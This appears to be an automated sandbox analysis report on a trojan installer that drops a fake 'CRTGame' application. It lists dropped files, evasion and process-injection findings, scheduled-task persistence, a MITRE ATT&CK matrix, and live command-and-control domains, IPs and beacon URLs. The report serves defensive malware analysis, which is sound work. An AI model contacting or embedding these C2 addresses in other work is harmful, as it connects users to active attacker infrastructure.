Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-QOSQ7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-2BNI8.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-MB554.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-3L2G6.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2DP67.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-HBA5G.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-RF28Q.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-UT63K.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-ENF4U.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\uninstall\is-4K1KF.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-8CIMQ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-PQ8T3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-1V1KO.tmp
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-82P0C.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-AE6QK.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-SEJ8F.tmpJump to dropped file
Source: C:\Users\user\Desktop\KRdh0OaXqH.exe | Evasive API call chain: GetSystemTime,DecisionNodes (graph_0-5687)
Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 3748 | Thread sleep count: 1511 > 30
Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 3748 | Thread sleep time: -3022000s >= -30000s
Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 6200 | Thread sleep time: -120000s >= -30000s
Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 3748 | Thread sleep count: 8446 > 30
Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 3748 | Thread sleep time: -16892000s >= -30000s
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_004520C0 FindFirstFileA,GetLastError,1_2_004520C0
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_00473F08 FindFirstFileA,FindNextFileA,FindClose,1_2_00473F08
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_00496568 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00496568
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_00463404 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463404
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_00463880 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463880
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_00461E78 FindFirstFileA,FindNextFileA,FindClose,1_2_00461E78
Source: C:\Users\user\Desktop\KRdh0OaXqH.exe | Code function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B30
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Thread delayed: delay time: 60000
Source: crtgame.exe, 00000007.00000002.3291501599.00000000009A7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW=[
Source: crtgame.exe, 00000007.00000002.3291501599.00000000009A7000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3291501599.0000000000927000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\KRdh0OaXqH.exe | API call chain: ExitProcess graph end node (graph_0-6727)
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | API call chain: ExitProcess graph end node (graph_5-2159)
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | API call chain: ExitProcess graph end node (graph_5-2399)
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 7_2_02A4FBBE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,7_2_02A4FBBE
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress,1_2_0044C030
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 7_2_02A35F14 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,GetTickCount,_memset,wsprintfA,_memset,_memset,_memset,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,_memset,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,_memset,_memset,_memset,_malloc,_memset,_strtok,_swscanf,_strtok,Sleep,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_memset,7_2_02A35F14
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 7_2_02A48F28 SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_02A48F28
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_00476FAC ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00476FAC
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_0042DFC4 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042DFC4
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 7_2_02A47A6D cpuid 7_2_02A47A6D
Source: C:\Users\user\Desktop\KRdh0OaXqH.exe | Code function: GetLocaleInfoA,0_2_004051FC
Source: C:\Users\user\Desktop\KRdh0OaXqH.exe | Code function: GetLocaleInfoA,0_2_00405248
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: GetLocaleInfoA,1_2_00408570
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: GetLocaleInfoA,1_2_004085BC
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_00457CE8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_00457CE8
Source: C:\Users\user\Desktop\KRdh0OaXqH.exe | Code function: 0_2_004026C4 GetSystemTime,0_2_004026C4
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_00454AB8 GetUserNameA,1_2_00454AB8
Source: C:\Users\user\Desktop\KRdh0OaXqH.exe | Code function: 0_2_00405CE4 GetVersionExA,0_2_00405CE4

                  Stealing of Sensitive Information

Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-SG9N2.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-MDCMM.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-O5AH5.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-V3CB3.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-0NR14.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-HBA5G.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-H4RQI.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-82P0C.tmp, type: DROPPED
Source: Yara match | File source: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3291926333.0000000000A25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: crtgame.exe PID: 5884, type: MEMORYSTR

                  Remote Access Functionality

Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-SG9N2.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-MDCMM.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-O5AH5.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-V3CB3.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-0NR14.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-HBA5G.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-H4RQI.tmp, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-82P0C.tmp, type: DROPPED
Source: Yara match | File source: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3291926333.0000000000A25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: crtgame.exe PID: 5884, type: MEMORYSTR
Mitre Att&ck Matrix (techniques listed per tactic in matrix order; a leading number is the count shown in that matrix cell)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 2 Native API; 1 Scheduled Task/Job; 2 Service Execution; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 1 DLL Side-Loading; 4 Windows Service; 1 Scheduled Task/Job; 1 Bootkit; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 1 Access Token Manipulation; 4 Windows Service; 12 Process Injection; 1 Scheduled Task/Job; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 23 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 21 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 12 Process Injection; 1 Bootkit; Dynamic API Resolution
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 1 System Time Discovery; 1 Account Discovery; 1 File and Directory Discovery; 35 System Information Discovery; 41 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 11 Application Window Discovery; 3 System Owner/User Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 2 Ingress Tool Transfer; 2 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 112 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph ID: 1575229 | Sample: KRdh0OaXqH.exe | Startdate: 14/12/2024 | Architecture: WINDOWS | Score: 100

Signatures on the sample node: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus / Scanner detection for submitted sample; 9 other signatures

Process tree from the behavior graph:
KRdh0OaXqH.exe (started)
    dropped: C:\Users\user\AppData\...\KRdh0OaXqH.tmp, PE32
    KRdh0OaXqH.tmp (started)
        dropped: C:\Program Files (x86)\CRTGame\crtgame.exe, PE32
        dropped: C:\Program Files (x86)\...\is-HBA5G.tmp, PE32
        dropped: C:\Program Files (x86)\...\is-82P0C.tmp, PE32
        dropped: 106 other files (none is malicious)
        signature: Uses schtasks.exe or at.exe to add and modify task schedules
        crtgame.exe (started)
            DNS/IP: goeiwef.com 185.237.206.129, 49904, 49920, 49923, ITLDC-NLUA, Ukraine
            DNS/IP: ayptoht.ru 94.232.249.187, 49788, 49818, 49848, INT-PDN-STE-ASSTEPDNInternalASSY, Syrian Arab Republic
            DNS/IP: 46.8.225.74, 2023, 49909, 49922, FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics, Russian Federation
        net.exe (started)
            conhost.exe (started)
            net1.exe (started)
        crtgame.exe (started)
            dropped: C:\ProgramData\SpaceXRaces\SpaceXRaces.exe, PE32
        schtasks.exe (started)
            conhost.exe (started)

Source | Detection | Scanner | Label | Link
KRdh0OaXqH.exe | 55% | ReversingLabs | Win32.Trojan.Sockssystemz |
KRdh0OaXqH.exe | 100% | Avira | HEUR/AGEN.1332570 |
Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy) | 3% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy) | 3% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy) | 3% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy) | 3% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy) | 3% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy) | 3% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy) | 3% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy) | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-0NR14.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-1V1KO.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-2BNI8.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-2JFSM.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-2Q15C.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-3L2G6.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-3PB3G.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-41E97.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-5CFA9.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-72UK0.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-82P0C.tmp | 3% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-8CIMQ.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-8REH5.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-9AV62.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-9OEDN.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-9QS5M.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-AE6QK.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-BLG4U.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-BUF5F.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-C09DN.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-CJ9O9.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-DC7IR.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-FL34R.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-H36N8.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-H4RQI.tmp | 3% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-HBA5G.tmp | 3% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-I2830.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-JN15J.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-M699B.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-MB554.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-MDCMM.tmp | 3% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-MSL58.tmp | 0% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-O5AH5.tmp | 3% | ReversingLabs | |
C:\Program Files (x86)\CRTGame\bin\x86\is-PKSJK.tmp | 0% | ReversingLabs | |
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label | Link
https://mp4v2.googlecode.com/svn/trunk | 0% | Avira URL Cloud | safe |
http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde | 0% | Avira URL Cloud | safe |
https://mp4v2.googlecode.com/svnrepository | 0% | Avira URL Cloud | safe |
http://goeiwef.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 | 0% | Avira URL Cloud | safe |
http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde2 | 0% | Avira URL Cloud | safe |
http://www.mp3dev.org/ID3Error | 0% | Avira URL Cloud | safe |
http://185.237.206.129/ | 0% | Avira URL Cloud | safe |
http://goeiwef.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca | 0% | Avira URL Cloud | safe |
goeiwef.com | 0% | Avira URL Cloud | safe |
http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde | 0% | Avira URL Cloud | safe |
http://www.mpg123.de | 0% | Avira URL Cloud | safe |
http://ocsps.ssl.com0Q | 0% | Avira URL Cloud | safe |
http://lame.sf.net32bits | 0% | Avira URL Cloud | safe |
https://mp4v2.googlecode.com/svn/trunkrepository | 0% | Avira URL Cloud | safe |
http://mingw-w64.sourceforge.net/X | 0% | Avira URL Cloud | safe |
http://lame.sf.net | 0% | Avira URL Cloud | safe |
http://94.232.249.187/ | 0% | Avira URL Cloud | safe |
http://LosslessAudio.org/0 | 0% | Avira URL Cloud | safe |
http://ayptoht.ru/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca | 0% | Avira URL Cloud | safe |
https://mp4v2.googlecode.com/svn | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
goeiwef.com | 185.237.206.129 | true | true | | unknown
ayptoht.ru | 94.232.249.187 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
goeiwef.com | true | Avira URL Cloud: safe | unknown
http://goeiwef.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 | true | Avira URL Cloud: safe | unknown
http://goeiwef.com/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca | true | Avira URL Cloud: safe | unknown
http://ayptoht.ru/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca | true | Avira URL Cloud: safe | unknown
